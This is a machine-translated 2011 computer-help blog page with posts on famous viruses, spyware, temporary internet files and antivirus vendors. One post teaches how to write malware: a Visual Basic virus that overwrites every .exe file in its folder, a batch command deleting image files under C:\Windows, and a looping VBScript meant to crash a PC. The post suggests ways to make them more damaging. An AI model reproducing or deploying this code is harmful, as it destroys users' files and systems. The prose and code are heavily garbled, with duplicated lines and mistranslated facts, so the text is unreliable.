Computer Helper

Thank You For Visiting Our Blog.check out site articles and Please +1 Our Blog And Post Your Valuable Comment.

Backlink Exchange

Please Add A Link Of Our Site On Your Site,And We'll Post Your Site Link On Your Site. And Please Add Our Site On Social Bookmarking Site, Thank You.

Work And Earn Money

minute workers
Showing posts with label Computer Viruses. Show all posts
Showing posts with label Computer Viruses. Show all posts

Wednesday, July 27, 2011

The 10 most destructive(Ever) viruses of history


In chronological order here are the 10 most destructive viruses of all time.

The 10 most destructive viruses

• CIH
• Blaster
• Melissa
• Sobig.F
• ILOVEYOU
• Bagle
• Code Red
• MyDoom
• SQL Slammer
• Sasser

1. CIH (1998)

Estimated Damage: 20 to 80 million, not counting the price of information destroyed.

Location: From Taiwan in June 1998, CHI is recognized as one of the most dangerous and destructive virus ever seen. The virus infects Windows executable files 95,98 and ME and was able to stay resident in memory of the infected computers and infect other executables.

Why?: What made it so dangerous was that soon affected many computers could rewrite data on the hard disk and leave it inoperable.

Trivia: CIH was distributed in one or the other major software as a demo game Activision "No".

2. Melissa (1999)

Damage Estimate: 300 to 600 million dollars

Location: A Wednesday March 26, 1999, W97M/Melissa became home to many revolving around the world. One estimate says that this script affects 15% to 20% of the world's computers.

Trivia: The virus used Microsoft Outlook to send further 50 of the users contact list. The message contained the phrase, "Here Is That You Asked document for ... do not show anyone else. ;-) "And was accompanied by an attached Word document, which was implemented by thousands of users and allowed the virus to infect computers and propagate through the network.

3. ILOVEYOU (2000)

Damage Estimate: 10 to 15 billion dollars

Location: Also known as "Loveletter" and "Love Bug", this was a Visual Basic script with an ingenious and irresistible candy: Promises of love. A May 3, 2000, the ILOVEYOU worm was first detected in Hong Kong and was transmitted via email with the subject "ILOVEYOU" and attachment, Love-Letter-For-YOU.TXT.VBS
Similarly, Melissa was sent to all contacts in Microsoft Outlook.

Why?: Thousands of users were attracted by the subject and clicked on the infected attachment. The virus also took the liberty of overwriting music files, pictures and more.

Trivia: As the Philippines had no laws that talk about virus writing the author of ILOVEYOU was not charged.

4. Code Red (2001)

Damage Estimate: $ 2.6 billion

Location: Code Red was a worm that infected computers for the first time July 13, 2001. It was a virulent bug because its objective was to attack computers that have the server (IIS) Microsoft's Internet Information Server. The worm was able to exploit a major vulnerability of this server.

Trivia: Also known as "Bady" Code Red was designed for maximum damage. In less than a week infected almost 400,000 servers and over a 1,000,000 in its short history.

5. SQL Slammer (2003)

Damage Estimate: Because SQL Slammer appeared on Saturday the economic damage was low. However, this attack 500,000 servers.

Trivia: SQL Slammer, also known as "Sapphire", dates from January 25, 2003 and its main focus is server, the virus was a 376-byte file that generated a random IP address and sent asimismoa these IPs. If the IP running under Microsoft's SQL Server Desktop Engine unpatched could be sent back to other IPs at random.
Slammer infected computers in 10 minutes 75.000.

6. Blaster (2003)

Damage Estimate: 2 to 10 billion dollars, hundreds of thousands of infected computers.

Location: The summer of 2003 became known Blaster also called "Lovsan" or "MSBlast".
The virus was detected on August 11 and spread rapidly in just two days. Conveyed through a vulnerability in Windows 2000 and Windows XP, and when it was triggered open a dialog in which the shutdown was imminent.

Trivia: Hidden in the code was curious MSBLAST.EXE topics:

    "I just want to say LOVE YOU SAN!" And "billy gates why do you Make this possible? Stop making money and fix your software! "

    "I just want to say I love you san!" And "billy gates Why do possible? for making money and fix your software! "


7. Sobig.F (2003)

Damage Estimate: 5 to $ 10 billion and more than one million infected computers.


Location: Sobig also attacked in August 2003 a horrible month for security. The most destructive variant of this worm was Sobig.F, who attacked the August 19 generating over 1 million copies of itself within the first 24 hours.

Trivia: The virus spread via e-mail and attached files as application.pif thank_you.pif. When activated, transmitting.
On September 10, 2003 the virus has also disabled and was no longer a threat, Microsoft offered in its day to that $ 250,000 to identify its author.

8. Bagle (2004)

Damage Estimate: $ 10 million and counting ...

Location: Bagle is a sophisticated worm that made its debut on January 18, 2004.
The code systems infected with a traditional mechanism, attaching files to an email and spread it.
The real danger of Bagle is that there are 60 to 100 variants of it, when the worm infects a computer open a TCP port that was used by an application to remotely access the system data.

Curiosities: The Bagle.B variant was designed to stop the January 28, 2004 but numerous other variants of the virus continue to operate.

9. MyDoom (2004)

Damage Estimate: Internet performance lags by 10% and page loading by 50%.

Location: In a few hours of January 26, 2004, MyDoom went around the world. Was transmitted via mail by sending an error message of course but also attacked the shared folders of users of the Kazaa network.

Curiosities: MyDoom was programmed to stop after the February 12, 2004.


10. Sasser (2004)

Damage Estimate: $ 10 million

Location: April 30, 2004 was its release date and was destructive enough to hang some French agency communications satellites.
Also managed to cancel flights many airlines.

Curiosities: Sasser was not transmitted via mail and did not require users to spread. Each time the worm was Windows 2000 and Windows XP this was not replicated to date, infected systems experiencing great instability.


Sasser was written by a young German of 17 years who spread the virus in their 18 birthday. As he wrote the code to be less standing out well but was found guilty of computer sabotage.

Friday, July 22, 2011

How to create a computer virus''stupid and malicious "- 2nd part



Computer viruses are in many forms with many different functions. Some are rather simplistic and can be detected by the average user while others are complex and go unnoticed for some time. The most common viruses within the classification of file infectors, which work by infecting executable files. They do this by inserting malicious code into an area of ​​the original file, allowing it to be executed each time the file is accessible Some of them are able to completely overwrite a file, making a whole program useless .
This is the case of this type of virus that we see today. Overwritters viruses. I know that the virus overwritters, unfortunately, have no chance to spread and they are not "intelligent". Despite all this overwritters can help you understand the basics of real virus. I'll give you the code first and then we will review it.
-=-=-=-=-=-=-=-=-=- Cut here =-=-=-=-=-=-=-=- =-=-=


 
Option Explicit Option Explicit
 
Dim MyArray () As Byte Sun myarray () As Byte
 
Sun victim As String Dim As String victim
 
Const MySize As Integer = 11776 Const MySize As Integer = 11776

 
Private Sub Form_Load () Private Sub Form_Load ()
 
On Error Resume Next On Error Resume Next
 
Free Free Sun Sun
 
Free = FreeFile Free = FreeFile

 
Open App.Path & "\" & & App.EXEName. "Exe" For Binary Access Read As # Free Open App.Path & "\" & & App.EXEName. "Exe" for Binary Access Read As # Free
 
ReDim myarray (MySize) ReDim MyArray (MySize)
 
Get # 1, 1, myarray myarray Get # 1, 1,
 
Close Close # # Free Free

 
victim = Dir (App.Path & "\" & "*. EXE") victim = Dir (App.Path & "\" & "*. exe")
 
While victim <> "" While victim <> ""

 
Open App.Path & "\" & victim For Binary Access Write As # Free Open App.Path & "\" & victim for binary access write as # Free
 
Put # 1,, myarray Put # 1,, myarray
 
Put # 1,, MySize Put # 1,, MySize
 
Close Close # # Free Free

 
victim = Dir () victim = Dir ()

 
Wend Wend

 
End End
 
End Sub End Sub

  
-=-=-=-=-=-=-=-=-=- Cut here =-=-=-=-=-=-=-=- =-=-=

Decode all this: (yum! J)
 
Option Explicit Option Explicit
 
Dim MyArray () As Byte Sun myarray () As Byte
 
Sun victim As String Dim As String victim
 
Const MySize As Integer = 11776 Const MySize As Integer = 11776 Here, we define the variables we will use the "myarray ()" variable that contains the binary code of the virus, "victim" is the variable that contains the file name of the victim and the "MySize" variable contains the size the virus.
 
Private Sub Form_Load () Private Sub Form_Load ()
 
On Error Resume Next On Error Resume Next We open the subfolder that we will use (Form_Load), and we have our error handle that is to say that in case of error the program will stop there.
 
Free Free Sun Sun
 
Free = FreeFile Free = FreeFile It's a good idea to follow the example of the Y2K virus. This will get rid of the read / write errors because it is open source.
 
Open App.Path & "\" & & App.EXEName. "Exe" For Binary Access Read As # Free Open App.Path & "\" & & App.EXEName. "Exe" for Binary Access Read As # Free
 
ReDim myarray (MySize) ReDim MyArray (MySize)
 
Get # 1, 1, myarray myarray Get # 1, 1,
 
Close Close # # Free Free Now let's get out the binary code of our virus and we store it in the variable "myarray".
 
victim = Dir (App.Path & "\" & "*. EXE") victim = Dir (App.Path & "\" & "*. exe")
 
While victim <> "" While victim <> ""

 
Open App.Path & "\" & victim For Binary Access Write As # Free Open App.Path & "\" & victim for binary access write as # Free
 
Put # 1,, myarray Put # 1,, myarray
 
Put # 1,, MySize Put # 1,, MySize
 
Close Close # # Free Free Here, we define the variable "victim" and we have our binary code in the program of the victim.
 
victim = Dir () victim = Dir ()

 
Wend Wend Then we put the victim at zero, and we repeat the whole process to infect all files. Exe in the current directory.
 
End End
 
End Sub End Sub And finally, we close the program and sub folders. 


***NOTE- This is only for learning,Do not misuse this.

How to create a computer virus''stupid and malicious "


Hello everyone.
Today I chose to speak about the virus, there's lots, we all have been infected at some time or another by these programs. Because before any virus is a program.
We'll see how it works but also how to create, of course!
In this first part, we'll start with fairly simple virus you will see:
Virus VB (Visual Basic):
This type of virus are the oldest and were among the first to have appeared.


Create a small virus not too bad ...

First of all I wish to warn you that this article is only for educational purposes, and you are not encouraged to reprtoduire this on your pc. You are responsible for your actions and neither I nor my host does seon held responsible.

We will learn to create a small virus * beats. :

It went:

To begin, open your favorite text editor (eg notepad). Then, without skipping steps online:


del c: windows *. bmp cls


After, enrigistrer code with the extension *. bat

Caution: Never open the file on your computer, the virus will run!

How it works explanation:

del c: windows *. bmp

del: used to remove
C: Windows is the folder where the command should be held
*: Followed by an extension means all files with that extension in this example the extension is *. bmp. So this mini virus will delete all files with the *. bmp (in locurrence images) found in windows.

This virus may be more dangerous if you change the extension in a more important but, I leave to your imagination free choice ^ ^


Create a nastier virus ...

know you dream of planting pc easily? ^ ^

It went:

Start by opening your text editor.
Then slaps the following code:


Set variable = CreateObject ("WScript.Shell")
Do
variable.run "notepad", false
Loop

After, save with the name you want, with the. Vbs

Small clarification:

Here, the notebook (that of windows) is the desired application, you can replace it with a heavier application (for faster results and better).
false: indicates that windows should not be initialized, only the process that the victim did not realize.
Loop means that it must be done in a loop: it must start the notebook, again and so on.

These viruses were created in Visual Basic,

***NOTE- This is only for learning,Do not misuse this.

Thursday, July 21, 2011

Temporary Internet Files - the Good, the Bad and the Ugly



With a little time invested in learning about internet security can go take a road accident prevention in the team. Temporary Internet files are not something to be feared, but it certainly must be careful to trust them and how to deal with them.
Temporary Internet files are image, text and format of the files that are stored on your hard drive by websites you visit. They are there for the Web without having to do anything. The files are stored on your computer the first time you visit the site for the next time you go to that website is enough to load new data or files that have changed since the last time you visited - files that have changed are uploaded to the folder of temporary Internet files at speeds much faster than over the Internet.
Store temporary Internet files on the hard drive significantly reduces the amount of time it takes to fully charge and view a website.
However, it should be considered in any discussion about temporary internet files. First, and possibly the most trivial of the concerns is that it is possible to lose all the updates the website. If your browser loads the files in the Temporary Internet files instead of the updated material from the website, you may miss a football score of the day, or you can get a different image that others are watching. The system is designed so that stuff does not happen, but the possibility is there.
Secondly, The storage of large files can clog itself. Fortunately, you can control the number or size of files that are stored on your hard drive. Normally in the Tools> Options menu of your browser may fix the amount of your hard drive that is willing to devote to the Temporary Internet Files. Depending on your habits and Navigation of the need for speed.
Third, the temporary files folder of the Internet may contain viruses, inappropriate images or text, files they may cause leakage of personal information Web sites.
Let me mention some things you can do to bring some control to your folder of temporary Internet files without destroying it completely.
I already mentioned that can limit the amount of your hard drive dedicated to hosting files from web sites visited. This is the best option for those who may be less concerned about inadequate or damaged files that are stored and more concerned about the ability of their Jurassic-era computer to perform at a decent speed. Some versions of popular browsers will not allow you to completely eliminate storing files, but may limit resources to 1% of your hard drive or a small number of megabytes
Some opt to regularly clean your temporary files folder of the Internet - this is obviously going to remove malicious files and free up some space for your team, but also remove the files you want.
In my opinion, the most prudent option is to use software available to manage the contents of Temporary Internet files. Some files you want, because they make life easier. Some files that do not want to because the team is stuck. There are computer programs that scan your computer and find all the files from the Internet (including cookies). The software makes recommendations as to whether the file in question is good, bad or ugly - all you have to do is decide to keep or trash.

Wednesday, July 20, 2011

Top 10 spyware and adware threats identified






Webroot, a provider of award-winning anti-spyware solution, issued a press release identifying the ten most significant emerging spyware threats and adware. Most of these probably have not heard and a few may surprise you.
It is estimated that 9 out of 10 computers are infected with spyware, also known as adware, scumware, malware and many others.
Here are the top 10.
1. PurtyScan- popup ads mislead users with an installation method, claiming to find and delete pornographic images.
2. n-CASE - This program is usually comes with free software.
3. Gator - adware program that displays advertisements based on your browsing habits on the Web. This program usually is linked with the program Kazaa file-sharing and other free software programs.
4. CoolWebSearch- hijacked home page, Internet Explorer settings, and searching the Web.
5.Transponder - Take all the data entered into online forms and then provides targeted ads.
6.ISTbar / AUpdate- spyware posing as a toolbar. It has been prepared to show pornography, pop-ups, and hijack your homepage and Internet searches.
7. KeenValue- an adware program that collects personal information and serves ads.
8. Internet Optimizer- hijacks error pages and redirects them to its own site.
9. Perfect Keylogger- records all keystrokes (including personal information, passwords, etc), clicks and web sites visited.
10. TIBS Dialer- hijacks phone modem and redirects to porn sites pay for phone minutes. 


The following precautions are recommended in the fight against spyware: install Microsoft security patches, avoid downloading and using free downloads and disable ActiveX in Internet Explorer. In addition, install at least one anti-spyware program, some experts recommend that actually have two installed. For starters, you can download a removal program free spyware such as Spybot Search & Destroy and Ad-Aware. There are also some good anti-spyware programs on the market that proactively protect your computer often (alert you before the spyware is installed).

Computer Viruses

Computer viruses are software programs that have the ability to autoreproducirse between computer systems. This is commonly called the infection suffered by a computer. After the malware infection that starts to take action, obviously a hidden and not authorized by the user, which in most cases are detrimental to the system and affect one way or another to the user and computer. Typical examples might include the deletion or data theft, computer malfunction, manifested a slow, etc.

Actually, computer viruses today are considered a subfamily of what is called a more generic "malware" or what is, malicious code. Its name comes from the English malicius software. And within the malware and we include these viruses, Trojans, worms and other species that abound in the networks.

For what purpose are created?

In the decade of the 90 computer viruses were created by programmers who wanted to experiment with these techniques playback software and obviously there was no profit whatsoever. Rather, they sought fame or prestige within a community of technicians and computer, say a divertimento.

Today the landscape has changed a lot. We can say that malware creation has become more professional and there is a clear objective and lucrative crime.

An example that everyone has heard, seen or read in the press are attacks against online banking by Trojans. As I said a moment ago, are programs designed to steal our credentials. Once the phisher gets our data can impersonate your identity in the service of the bank and make transfers from your account.

There are real gangsters in the world who have seen this type of crime an excellent business, but the police chases them and in many cases end up in jail.

How are?

Although in the beginning used to be distributed by sharing infected floppy disks, today we can find malware that is distributed via USB pen drives and memory.

But undoubtedly the major distribution channel par excellence is the Internet through Web pages and services such as chat, instant messaging, email and social networks lately. We may also receive when you download malware executables from peer to peer

How many viruses are there?

Within the malware there are a lot of categories, such as viruses, trojans, worms, adware, spyware, scam, rogue, phishing, hoaxes, rootkits, spam, etc.. ? in short, is a long list that also increases day by day.

In turn there are subfamilies within each of these categories. Besides those mentioned, we can find macro viruses (a small program or set of actions) that infect office documents such as the typical virus in Word. O viruses that infect disks injecting its code into the boot sector and not allowing them to use the equipment.

Another interesting type of malware is one that is installed on your computer and encrypts all our information to us hard, displaying a message on screen if we want to retrieve that information (your photos, documents, music, movies, letters, etc.). We make a payment to a bank account after which we will receive a key program that allows us to recover your hard drive. It is what is called ransomware of ransom, kidnapping in English.


List of antivirus:-
Panda Software
You can try or buy "Titanium Antivirus and Platinum Internet Security." In addition the site has information on the latest viruses. If you want an online review at the end of this page have a check of Panda Antivirus.
McAfee
McAfee security products and services on the Internet, it provides security to protect their business environments and content from viruses and malicious code.
Symantec (Norton)
Norton brand of security products for Symantec's consumer protection work on the desktop.
TrendMicro
Its solutions protect the flow of data in your PC, email servers and Internet access.
Secuware
Its flagship product is the "Brid Security Architecture". Protect data, communications, operating system and all applications. It's the old anyware.
Norman
Norman's products are available for home users who want to surf the Internet and for large corporations.
Authentium
It is the leading provider of security solutions for equipment. In English.
Kaspersky
Contains new versions 4.5 of Kaspersky in Castilian. Available for a wide range of operating systems.
Antivir
AntiVir Personal Edition offers effective protection against computer viruses on personal computers. In English.
Sophos
Virus protection for businesses and organizations of any size with its software and technical support 24 hours.
PER Antivirus
Against all viruses, macro viruses, worms, Trojans, Mail, IRC, Instant Messaging, P2P, Spyware, Adware, etc.. Receive 6 versions per year, daily updates and 24 hour support.
NOD-32
Current version obtained NOD32 4.0437 26 th VB 100%. Includes free tools to disinfect your computer.
AVG anti-virus
AVG Anti-Virus 7.0 wants to grow with your company or organization.
BitDefender
Individual solutions, free tools, antivirus online. "BitDefender Professional 7.2" on launch. Free upgrade.
eTrust
An industrial strength firewall for desktops and small offices.
Avast!
Based on the technology ALWIL offers real-time protection from all types of infections. Page in English.
Rav Antivirus
To permanently protect your computer from viruses, trojans and worms. Page in English.
Zone Alarm Antivirus
ZoneAlarm Antivirus provides essential security you need on the Internet, block viruses, hackers, etc.. In a single easy to use solution.
F-Secure
F-Secure Corporation protects individuals and businesses from computer viruses and other threats that extend across the Internet and mobile networks.
Clam AntiVirus
Clam is an antivirus toolkit for UNIX. The main purpose of this software is the integration with mail servers.
Hacksoft
Real-time vaccine that protects against all possible virus entry: E-mail, Web, Web, shared resources, chat virus ...
Esafe
Protection for the entry of viruses and spyware. It is more oriented toward antivirus spyware. In English
Portland
Protector Plus Antivirus is the best program against viruses, spyware, trojans and worms. Windows 98 onwards.

Use a Good Internet Security Software And Be Safe.